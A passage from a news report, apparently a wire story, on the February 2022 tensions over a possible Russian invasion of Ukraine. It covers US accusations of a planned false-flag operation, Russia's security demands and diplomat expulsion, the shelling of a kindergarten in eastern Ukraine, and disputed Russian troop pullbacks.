“Demonstrate it by sending your troops, your tanks, your planes, back to their barracks and hangars, and sending your diplomats to the negotiating table,” he said.

President Joe Biden, at the White House, accused Moscow of preparing a “false flag operation” as a pretext for an attack and said this could happen “in the next several days.”

“They have not moved any of their troops out. They’ve moved more troops in,” Biden said. “Every indication we have is that they’re prepared to go into Ukraine.”

He added, however, that diplomacy is not dead. “There is a path. There is a way through this,” he said.

– ‘Forced to respond’ –

Russia has massed enormous air, land and sea forces around Ukraine. President Vladimir Putin and officials say they do not plan to invade Ukraine and that the troops are only conducting practice exercises.

However, Putin has made clear that the price for removing any threat would be Ukraine agreeing never to join NATO and for the Western alliance to pull back from a swath of eastern Europe, effectively splitting the continent into Cold War-style spheres of influence. Ukraine is far from being ready to join NATO but has set this as part of a broader goal to integrate with the democracies of western Europe, making a historic break from Russia’s orbit.

The United States said Thursday that it had received Putin’s response to its offers of a diplomatic solution to the crisis, but did not give any reaction to the contents.

The Russian foreign ministry indicated that there was little to discuss.

“In the absence of will on the American side to negotiate firm and legally binding guarantees on our security from the United States and its allies, Russia will be forced to respond, including with military-technical measures,” the foreign ministry said.

“We insist on the withdrawal of all US armed forces in Central Europe, Eastern Europe and the Baltics,” it added.

Russia also expelled the number two US diplomat in Moscow, the US State Department said, condemning the “unprovoked” action.

– Artillery fire on kindergarten –

Russia took over Ukraine’s Crimea region and began backing heavily armed separatists in the eastern Donetsk and Lugansk regions in 2014, sparking a war that has already cost thousands of lives.

Sporadic fighting remains common in the east and the Ukrainian army accused the pro-Russian separatists of 34 ceasefire breaches on Thursday, 28 of them using heavy weapons.

The potentially most serious incident — an example of the kind of spark that many fear could ignite far more intense fighting — was the shelling of a kindergarten in the village of Stanytsia-Luganska. Children were inside but none were hit.

Ukrainian President Volodymyr Zelensky tweeted that the attack “by pro-Russian forces is a big provocation.”

Russian news agencies meanwhile quoted authorities in the separatist Lugansk region saying they blamed Kyiv after the situation on the frontline “escalated significantly”.

US Defense Secretary Lloyd Austin described Thursday’s reports as “troubling”.

“We’ve said for some time that the Russians might do something like this in order to justify a military conflict. So we’ll be watching this very closely,” Austin told journalists after a meeting with NATO counterparts. 

Putin earlier this week claimed with no evidence that Ukraine is committing “genocide” in the eastern region.

– Disputed pull-out –

Moscow has made several announcements of troop withdrawals this week and on Thursday said that units of the southern and western military districts, including tank units, had begun returning to their bases from near Ukraine.

Defense ministry spokesman Igor Konashenkov said some troops had returned to their garrisons in several areas far from the border, including Chechnya and Dagestan in the North Caucasus, and near Nizhny Novgorod, some 300 kilometers (185 miles) east of Moscow.

After previously announced withdrawals earlier this week, the United States, NATO and Ukraine all said they had seen no evidence of a pullback, with Washington saying Russia had in fact moved 7,000 more troops near the border.

Zelensky said Thursday his country was not looking for foreign forces within its borders.

“We have no need for soldiers with foreign flags on our territory. We are not asking for that. Otherwise, the entire world would be destabilized,” he told the RBK Ukraine website.
